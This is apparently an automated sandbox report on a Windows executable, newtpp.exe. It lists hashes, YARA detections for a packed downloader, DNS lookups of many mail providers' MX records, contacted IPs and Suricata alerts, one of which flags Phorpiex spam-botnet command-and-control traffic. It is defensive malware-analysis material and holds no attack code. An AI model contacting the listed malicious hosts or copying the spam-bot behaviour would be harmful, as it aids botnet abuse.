popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

newtpp.exe

Generic Malware Malicious Library Downloader Admin Tool (Sysinternals etc ...) Antivirus UPX Malicious Packer PE File PE32 PowerShell
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6403_us July 26, 2024, 11:57 a.m. July 26, 2024, noon
Size 79.0KB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 e2e3268f813a0c5128ff8347cbaa58c8
SHA256 d8b83f78ed905a7948e2e1e371f0f905bcaaabbb314c692fee408a454f8338a3
CRC32 F030B5A5
ssdeep 1536:W9mw4/inFmav82TmKtj+5qUPsY3BCHYJhcWPA4G9kj3K1:CmwohOBiPsWMH4ogj3K
Yara
  • Network_Downloader - File Downloader
  • Malicious_Library_Zero - Malicious_Library
  • Admin_Tool_IN_Zero - Admin Tool Sysinternals
  • PE_Header_Zero - PE File Signature
  • Malicious_Packer_Zero - Malicious Packer
  • IsPE32 - (no description)
  • UPX_Zero - UPX packed file
  • Generic_Malware_Zero - Generic Malware

Name Response Post-Analysis Lookup
mx2c1.comcast.net
A 96.102.18.146
96.102.18.146
aim.com
MX mx-aol.mail.gm0.yahoodns.net
13.248.158.7
ntlworld.com
MX mxin10.virginmedia.com
MX mxin5.virginmedia.com
213.105.9.42
icanhazip.com
A 104.16.184.241
A 104.16.185.241
104.16.184.241
mx2.mxge.comcast.net
A 96.102.18.147
A 96.103.145.163
96.102.18.147
cox.net
MX cxr.mx.a.cloudfilter.net
98.182.1.143
charter.net
MX mx0.charter.net
99.83.251.242
mx1h1.comcast.net
A 96.102.157.181
96.102.157.181
comcast.net
MX mx1c1.comcast.net
MX mx2.mxge.comcast.net
MX mx1a1.comcast.net
MX mx1h1.comcast.net
MX mx2c1.comcast.net
MX mx1.mxge.comcast.net
MX mx2a1.comcast.net
MX mx2h1.comcast.net
96.99.227.0
mx2h1.comcast.net
A 96.102.157.180
96.102.157.180
mx0.charter.net
A 47.43.18.9
47.43.18.9
optonline.net
MX mx.altice.prod.cloud.openwave.ai
167.206.148.154
mx.altice.prod.cloud.openwave.ai
A 65.20.63.100
65.20.63.100
ff-ip4-mx-vip1.prodigy.net
A 144.160.159.21
144.160.159.21
verizon.net
MX mx-aol.mail.gm0.yahoodns.net
72.21.81.253
mta6.am0.yahoodns.net
A 67.195.204.77
A 98.136.96.74
A 67.195.228.109
A 98.136.96.77
A 98.136.96.75
A 67.195.228.111
A 67.195.204.79
A 67.195.228.110
67.195.228.106
netzero.net
MX mx.dca.untd.com
MX mx.vgs.untd.com
64.136.45.168
cxr.mx.a.cloudfilter.net
A 34.212.80.54
A 35.162.106.154
A 18.209.118.139
A 52.73.137.222
34.212.80.54
juno.com
MX mx.vgs.untd.com
MX mx.dca.untd.com
64.136.53.46
www.update.microsoft.com
CNAME redir.update.msft.com.trafficmanager.net
A 20.109.209.108
20.109.209.108
yahoo.com
MX mta5.am0.yahoodns.net
MX mta7.am0.yahoodns.net
MX mta6.am0.yahoodns.net
74.6.143.25
mail.com
MX mx00.mail.com
MX mx01.mail.com
82.165.229.87
att.net
MX ff-ip4-mx-vip1.prodigy.net
MX ff-ip4-mx-vip2.prodigy.net
MX al-ip4-mx-vip2.prodigy.net
MX al-ip4-mx-vip1.prodigy.net
144.160.36.42
mx-aol.mail.gm0.yahoodns.net
A 67.195.204.75
A 67.195.228.84
A 98.136.96.93
A 67.195.204.80
A 98.136.96.92
A 67.195.228.86
98.136.96.92
mx01.mail.com
A 74.208.5.22
74.208.5.22
mx.dca.untd.com
A 64.136.44.37
64.136.44.37
mx1a1.comcast.net
A 96.103.145.163
96.103.145.163
al-ip4-mx-vip2.prodigy.net
A 144.160.235.144
144.160.235.144
al-ip4-mx-vip1.prodigy.net
A 144.160.235.143
144.160.235.143
mxin5.virginmedia.com
A 84.116.6.18
84.116.6.18
mx.vgs.untd.com
A 64.136.52.37
64.136.52.37
bellsouth.net
MX ff-ip4-mx-vip1.prodigy.net
MX ff-ip4-mx-vip2.prodigy.net
MX al-ip4-mx-vip2.prodigy.net
MX al-ip4-mx-vip1.prodigy.net
216.77.188.73
sbcglobal.net
MX ff-ip4-mx-vip1.prodigy.net
MX ff-ip4-mx-vip2.prodigy.net
MX al-ip4-mx-vip2.prodigy.net
MX al-ip4-mx-vip1.prodigy.net
IP Address Status Action
104.16.185.241 Active Moloch
109.74.35.21 Active Moloch
109.74.43.21 Active Moloch
144.160.159.21 Active Moloch
144.160.235.143 Active Moloch
144.160.235.144 Active Moloch
151.241.237.185 Active Moloch
164.124.101.2 Active Moloch
185.215.113.66 Active Moloch
194.93.26.210 Active Moloch
195.158.22.13 Active Moloch
2.185.163.114 Active Moloch
20.109.209.108 Active Moloch
213.230.90.222 Active Moloch
217.30.160.154 Active Moloch
35.162.106.154 Active Moloch
47.43.18.9 Active Moloch
5.238.186.28 Active Moloch
64.136.44.37 Active Moloch
64.136.52.37 Active Moloch
65.20.63.100 Active Moloch
67.195.204.75 Active Moloch
67.195.204.80 Active Moloch
67.195.228.111 Active Moloch
74.208.5.22 Active Moloch
77.221.27.219 Active Moloch
77.91.77.92 Active Moloch
78.85.106.173 Active Moloch
83.239.55.170 Active Moloch
84.116.6.18 Active Moloch
86.62.3.154 Active Moloch
95.58.72.245 Active Moloch
95.59.4.234 Active Moloch
96.102.157.180 Active Moloch
96.102.157.181 Active Moloch
96.102.18.146 Active Moloch
96.102.18.147 Active Moloch
96.103.145.163 Active Moloch
98.136.96.92 Active Moloch
98.136.96.93 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 185.215.113.66:80 -> 192.168.56.103:49173 2400032 ET DROP Spamhaus DROP Listed Traffic Inbound group 33 Misc Attack
UDP 192.168.56.103:64894 -> 164.124.101.2:53 2054169 ET INFO External IP Lookup Domain in DNS Lookup (icanhazip .com) Device Retrieving External IP Address Detected
TCP 192.168.56.103:49177 -> 104.16.185.241:80 2017398 ET POLICY IP Check Domain (icanhazip. com in HTTP Host) Attempted Information Leak
TCP 144.160.159.21:25 -> 192.168.56.103:49195 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.93:25 -> 192.168.56.103:49187 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49246 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.93:25 -> 192.168.56.103:49184 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49208 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.93:25 -> 192.168.56.103:49193 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.93:25 -> 192.168.56.103:49198 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49200 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.93:25 -> 192.168.56.103:49190 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49206 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49197 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49204 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.93:25 -> 192.168.56.103:49209 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.93:25 -> 192.168.56.103:49210 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.93:25 -> 192.168.56.103:49212 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.93:25 -> 192.168.56.103:49236 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49214 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49215 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.93:25 -> 192.168.56.103:49213 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.93:25 -> 192.168.56.103:49232 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49275 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49222 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49284 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.93:25 -> 192.168.56.103:49226 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.93:25 -> 192.168.56.103:49288 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.93:25 -> 192.168.56.103:49290 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.93:25 -> 192.168.56.103:49302 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49315 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49327 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49335 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49345 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49360 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49357 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49364 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49192 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49387 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49241 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.144:25 -> 192.168.56.103:49415 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49451 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49268 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.93:25 -> 192.168.56.103:49281 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49502 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49592 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49604 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.144:25 -> 192.168.56.103:49626 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.144:25 -> 192.168.56.103:49642 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49306 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.144:25 -> 192.168.56.103:49661 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49318 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49670 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49673 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49342 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49705 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49388 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49399 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49413 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49422 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49429 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49722 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49445 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.144:25 -> 192.168.56.103:49467 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49492 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49496 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49500 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49499 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49764 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49769 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49782 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49789 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49791 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49807 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49811 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49826 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49828 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49508 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49507 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.144:25 -> 192.168.56.103:49509 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 192.168.56.103:49193 -> 98.136.96.93:25 2045229 ET MALWARE Win32/Phorpiex Template 9 Active - Outbound Malicious Email Spam Malware Command and Control Activity Detected
TCP 98.136.96.93:25 -> 192.168.56.103:49230 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.93:25 -> 192.168.56.103:49231 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49251 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49264 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.93:25 -> 192.168.56.103:49260 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.93:25 -> 192.168.56.103:49276 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49299 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49280 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49238 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.93:25 -> 192.168.56.103:49240 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49316 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49329 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49256 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49338 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49347 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.144:25 -> 192.168.56.103:49265 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49369 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49363 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.144:25 -> 192.168.56.103:49274 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49426 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49374 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49287 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49421 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49377 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49430 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.93:25 -> 192.168.56.103:49297 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49398 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.144:25 -> 192.168.56.103:49439 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49418 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49446 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49293 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49419 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49303 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49491 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49448 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49322 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49493 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49447 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49321 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49497 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49465 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49336 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49346 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49530 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49482 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49355 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49489 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49552 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.93:25 -> 192.168.56.103:49282 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49557 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49362 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49373 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49339 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.144:25 -> 192.168.56.103:49578 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49341 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49580 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49392 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49519 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49350 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49417 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49588 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49526 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49414 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49528 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49361 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49438 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49483 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49366 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49452 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.144:25 -> 192.168.56.103:49498 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49527 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49389 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49462 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49621 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49533 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49466 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49634 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49408 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49473 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49539 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49407 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49503 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49570 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49481 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49894 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49896 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49444 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49504 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49455 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49520 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49461 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49597 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.144:25 -> 192.168.56.103:49525 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49468 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49606 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49547 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49486 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49611 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49495 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.144:25 -> 192.168.56.103:49620 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.144:25 -> 192.168.56.103:49560 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49622 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49511 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49618 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.235.143:25 -> 192.168.56.103:49579 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49524 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 144.160.159.21:25 -> 192.168.56.103:49584 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
TCP 98.136.96.92:25 -> 192.168.56.103:49631 2260002 SURICATA Applayer Detect protocol only one direction Generic Protocol Command Decode
